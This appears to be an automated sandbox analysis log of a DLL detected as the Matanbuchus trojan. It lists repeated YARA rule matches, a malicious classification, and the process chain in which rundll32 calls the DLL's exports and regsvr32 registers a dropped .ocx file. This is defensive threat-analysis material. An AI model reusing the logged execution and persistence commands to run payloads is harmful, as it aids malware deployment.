                Source: sslproxydump.pcap, type: PCAPMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                Source: 34.2.regsvr32.exe.6b810000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                Source: 14.2.rundll32.exe.6d050000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                Source: 14.2.rundll32.exe.4910000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                Source: 18.2.rundll32.exe.6d050000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                Source: 22.2.rundll32.exe.6d050000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                Source: 14.2.rundll32.exe.4910000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                Source: 34.2.regsvr32.exe.7ee40000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                Source: 34.2.regsvr32.exe.7ee40000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                Source: 14.2.rundll32.exe.7f330000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                Source: 14.2.rundll32.exe.7f330000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                Source: 14.2.rundll32.exe.7f330000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                Source: 14.2.rundll32.exe.7f330000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                Source: 34.2.regsvr32.exe.7ee40000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                Source: 34.2.regsvr32.exe.7ee40000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                Source: 18.2.rundll32.exe.7ed40000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                Source: 18.2.rundll32.exe.7ed40000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                Source: 18.2.rundll32.exe.7ed40000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                Source: 18.2.rundll32.exe.7ed40000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                Source: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                Source: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                Source: 00000022.00000002.3113971469.000000007EE40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                Source: 00000022.00000002.3113971469.000000007EE40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                Source: 0000000E.00000002.3111806010.0000000004910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                Source: 00000022.00000002.3112823931.000000006B811000.00000020.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                Source: 00000016.00000002.1885875877.000000006D051000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                Source: 00000012.00000002.3112574505.0000000005081000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                Source: 00000012.00000002.3112574505.0000000005081000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                Source: 00000022.00000002.3112253212.00000000056DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                Source: 00000022.00000002.3112253212.00000000056DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                Source: 0000000E.00000002.3112462220.0000000004BA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                Source: 0000000E.00000002.3112462220.0000000004BA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                Source: 0000000E.00000002.3113053269.000000006D051000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                Source: 00000012.00000002.3113049716.000000006D051000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                Source: 00000012.00000002.3114291162.000000007ED40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                Source: 00000012.00000002.3114291162.000000007ED40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                Source: C:\Users\user\8f08\user-PC\user-PC.ocx, type: DROPPEDMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                Source: classification engineClassification label: mal100.troj.evad.winDLL@44/7@3/2
                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\8f08
                Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\8f08
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1020:120:WilError_03
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7588
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6448:120:WilError_03
                Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\3164e4ff-c709-4dec-a976-0f3f08fd1379
                Source: file.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\SysWOW64\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\file.dll,CheckLicense
                Source: file.dllVirustotal: Detection: 16%
                Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\file.dll"
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\file.dll",#1
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\file.dll,CheckLicense
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",#1
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\file.dll,DllInit
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\file.dll,DllInstall
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",CheckLicense
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",DllInit
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",DllInstall
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_setopt
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_perform
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_init
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_cleanup
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",Uninitialize
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",ThreadFunction
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",Main
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",InitDll
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",Init
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",DllUninitialize
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7588 -s 608
                Source: unknownProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.ocx" "C:\Users\user\8f08\user-PC\user-PC.ocx"
                Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.ocx" "C:\Users\user\8f08\user-PC\user-PC.ocx"
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\loaddll32.exeSection loaded: apphelp.dll
                Source: C:\Windows\System32\loaddll32.exeSection loaded: windows.storage.dll
                Source: C:\Windows\System32\loaddll32.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\loaddll32.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                Source: C:\Windows\System32\regsvr32.exeSection loaded: apphelp.dll
                Source: C:\Windows\System32\regsvr32.exeSection loaded: aclayers.dll
                Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
                Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc_os.dll
                Source: C:\Windows\System32\regsvr32.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\regsvr32.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: msi.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mswsock.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: winnsi.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: gpapi.dll
